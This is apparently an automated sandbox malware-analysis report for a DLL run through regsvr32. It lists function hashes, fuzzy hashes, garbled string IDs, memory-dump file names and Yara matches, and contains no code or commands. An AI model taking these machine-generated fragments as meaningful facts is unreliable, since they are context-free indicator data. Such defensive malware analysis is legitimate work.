                                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                                • Instruction ID: 8d4e941a129a1d1ed0c4924334c112150d49eb2a4adcb626260f19275c110cab
                                                                                                                                                • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                                • Instruction Fuzzy Hash: 432165A1B0C55BC1FA20CB23E9642F9A3A1FF44B8CF445A31DA4D47555EE2CE585C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 1h$I-$IY$QL&$li7$o
                                                                                                                                                • API String ID: 0-890095520
                                                                                                                                                • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                                • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                                                                                                • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                                • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 1$ {,$"$$-%$Rku$ i
                                                                                                                                                • API String ID: 0-1845893065
                                                                                                                                                • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                                • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                                                                                                • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                                • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: VUS/$YV~$p$@$EX$OX
                                                                                                                                                • API String ID: 0-2743166816
                                                                                                                                                • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                                • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                                                                                                • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                                • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                                • Instruction ID: d65d4dcf2e10f5e296c943d78686bf8447ba243fcab48474fff7d649fdc2e664
                                                                                                                                                • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                                • Instruction Fuzzy Hash: 4901526171DA19C1EB40CF22E8A42697360FF46B94F456930EF5E47790DE3CD995C320
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale$_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1743167714-0
                                                                                                                                                • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                                • Instruction ID: 82ee01515c052a84ced36173fff1a2c44c8355a6915e9c9ff7ffed6c38b41f7f
                                                                                                                                                • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                                • Instruction Fuzzy Hash: 146151B6B0C599D7D6689A62D9583E97391FF84709F000A3AD75D87290CF3CE4A4C731
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                                • API String ID: 0-746338152
                                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                                • API String ID: 0-498664264
                                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: >97"$?$LsRW$~x
                                                                                                                                                • API String ID: 0-2554301858
                                                                                                                                                • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                                • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                                                                                                • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                                • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                                • API String ID: 0-784369960
                                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
